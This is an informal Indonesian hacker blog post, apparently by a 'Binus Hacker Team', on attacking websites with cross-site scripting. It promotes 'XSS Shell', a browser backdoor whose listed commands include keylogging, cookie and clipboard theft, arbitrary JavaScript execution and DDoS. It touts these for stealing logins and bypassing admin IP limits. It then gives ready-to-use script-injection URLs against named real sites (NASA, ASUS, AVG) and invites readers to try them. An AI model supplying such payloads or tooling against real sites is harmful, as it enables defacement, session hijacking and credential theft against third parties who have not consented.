Huah! Emang jaman udah serba mudah :) Ni klo ada yang nanya gimana sih cara ngehack pake XSS? Cross-Site Scripting!

Haduh coy, itu gampang banget! Sekarang mah gak usah riber ribet.

Pertama gw belajarnya dari sini ni, tapi agak ribet. Buat newbie sih gak apa” buat blajar lebih dalam ajah.

Link dari abang Rsnake: http://ha.ckers.org/xss.html

Itu tutorial mantap banget dah buat XSS.

Btw ini ada di video cara simplenya:
Part 1.

Part.2

Part.3

Nah semuanya, itu semua make XSS Shell atau lebih terkenal dengan XSS Tunnel – Proxy. Nah ini penjelasannya.

XSS Shell adalah XSS backdoor interaktif yang memungkinkan mendapatkan kontrol atas Cross-Site Scripting (XSS) vulnerability dalam aplikasi web. Menunjukkan seberapa kuatnya serangan melalui XSS ini.

APAKAH XSS SHELL?

XSS Shell adalah XSS backdoor dan zombie manager. Konsep ini pertama kali dikenalkan oleh XSS-Proxy (http://xss-proxy.sourceforge.net/). Biasanya dalam serangan XSS, penyerang memiliki satu target, dimana dengan XSS Shell anda dapat mengirim permintaan interaktif dan mendapatkan respon dari korban. Anda dapat menyisipkan backdoor pada halaman tersebut.

Anda bisa mencuri autektikasi pada website, Anda dapat memotong pembatasan IP di administrasi panel, Anda dapat DDoS beberapa sistem . Pada dasarnya alat ini menunjukkan bahwa Anda dapat berbuat lebih banyak dengan XSS.

FEATURES

XSS Shell memiliki beberapa fitur untuk memperoleh akses terhadap target. Anda juga dapat menambahkan perintah Anda sendiri.

Kebanyakan dari fitur yang dapat diaktifkan atau dinonaktifkan dari konfigurasi atau dapat dirubah sendiri dengan merubah sourcecode.

Fitur:

* Regenerating page
* Keylogger
* Mouse logger

Built-in Perintah:

* Mendapatkan Keylogger Data
* Mendapatkan Halaman (Current diberikan Dom / seperti screenshot)
* Mendapatkan Cookie
* Menjalankan javascript (eval)
* Mendapatkan Clipboard (IE only)
* Mendapatkan alamat IP internal (hanya Firefox + JVM)
* Mendapatkan cookie URL yang dikunjungi
* DDoS
* Force untuk melakukan Crash ke browser

Silakan coba berikut ini:

NASA Site:

http://comments-submit.nasa.gov/commenting/Comment.do?location=%22%3E%3C/TITLE%3E%3CSCRIPT%3Ealert(%22BinusHacker%20Was%20Here!!%22);%3C/SCRIPT%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

ASUS Site:

http://vip.asus.com/eservice/techservok.aspx?SLanguage=en-us&caseid=%3Cscript%3Ealert(%22XSS%20ATTACK%20By%20BINUSHACKER%20TEAM%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

AVG Site:

http://www.avg.com/platforms?lic=%22%3E%3Cscript%3Ealert(%22BinusHacker%20Team%20Was%20Here%22)%3C/script%3E%3CMARQUEE%20BGCOLOR=%22RED%22%3E%3CH1%3EXSS%20Attack%20by%20BinusHacker%20Team%3C/H1%3E%3C/MARQUEE%3E

Silakan anda otak atik sendiri menggunakan XSS Shell.

===============[ EOF ]===============

Gw tidak mengajarkan kejahatan, cuma berbagi pengetahuan :D

Greetz: Buat gwe sendiri.. Wkwkwk [ GG Mode On ]

Special thanks: Binus Hacker Team